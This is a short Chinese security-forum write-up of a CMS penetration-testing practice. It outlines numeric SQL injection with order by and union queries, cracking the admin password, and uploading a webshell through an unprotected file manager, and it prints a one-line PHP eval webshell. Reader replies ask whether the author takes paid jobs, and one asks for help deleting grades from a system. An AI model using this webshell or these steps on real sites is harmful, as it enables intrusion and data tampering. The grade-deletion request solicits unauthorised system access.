[分享]记一次cms的web渗透测试练习-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[分享]记一次cms的web渗透测试练习

发表于: 2024-8-19 09:05 12564

[分享]记一次cms的web渗透测试练习

mb_mottwruq 活跃值

2024-8-19 09:05

12564

图片描述
点击文章发现

尝试进行sql注入

得到漏洞为数字型
通过order by语句得到字段总数为15

通过union联合查询得到显示的字段编号

将database()带入得到数据库名为cms

接下来就是查表名、字段名、具体数据

发现密码经过加密，尝试解密
图片描述
通过解密得知admin账户的密码为123456
登陆后台

文件管理界面存在文件上传漏洞，尝试上传webshell

图片描述
未做任何防护，上传成功！
用蚁剑连接webshell

连接成功！

<?php @eval($_POST[777])?>

登录后可查看完整内容

[注意]看雪招聘，专注安全领域的专业人才平台！

#SQL注入

收藏・6

免费・6

支持

赞赏记录

参与人

雪币

留言

时间

WMBa0

谢谢你的细致分析，受益匪浅！

2025-3-4 16:13

PLEBFE

感谢你的贡献，论坛因你而更加精彩！

2024-11-4 06:18

五条悟

感谢你的贡献，论坛因你而更加精彩！

2024-10-22 10:27

mb_fefksfsl

为你点赞！

2024-9-28 11:38

米龙·0xFFFE

感谢分享渗透思路

2024-8-21 06:28

w2w

感谢你的积极参与，期待更多精彩内容！

2024-8-19 16:20

最新回复 (4)
w2w 雪币： 20 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 11 粉丝 0 关注私信	w2w 2 楼 666666 2024-8-19 16:05 0
mb_yexxtbpn 雪币： 304 能力值： ( LV1，RANK：0 ) 在线值：发帖 1 回帖 3 粉丝 0 关注私信	mb_yexxtbpn 3 楼是否接单 2024-9-28 00:34 0
mb_rrlhyklk 雪币： 0 能力值： ( LV1，RANK：0 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	mb_rrlhyklk 4 楼能否接单帮忙删除系统的一些成绩 2024-12-9 03:06 0
mb_rrlhyklk 雪币： 0 能力值： ( LV1，RANK：0 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	mb_rrlhyklk 5 楼必有重谢 2024-12-9 03:07 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

mb_mottwruq

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区

最新回复 (4)
w2w 雪币： 20 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 11 粉丝 0 关注私信	w2w 2 楼 666666 2024-8-19 16:05 0
mb_yexxtbpn 雪币： 304 能力值： ( LV1，RANK：0 ) 在线值：发帖 1 回帖 3 粉丝 0 关注私信	mb_yexxtbpn 3 楼是否接单 2024-9-28 00:34 0
mb_rrlhyklk 雪币： 0 能力值： ( LV1，RANK：0 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	mb_rrlhyklk 4 楼能否接单帮忙删除系统的一些成绩 2024-12-9 03:06 0
mb_rrlhyklk 雪币： 0 能力值： ( LV1，RANK：0 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	mb_rrlhyklk 5 楼必有重谢 2024-12-9 03:07 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[分享]记一次cms的web渗透测试练习

账号登录 验证码登录

账号登录

验证码登录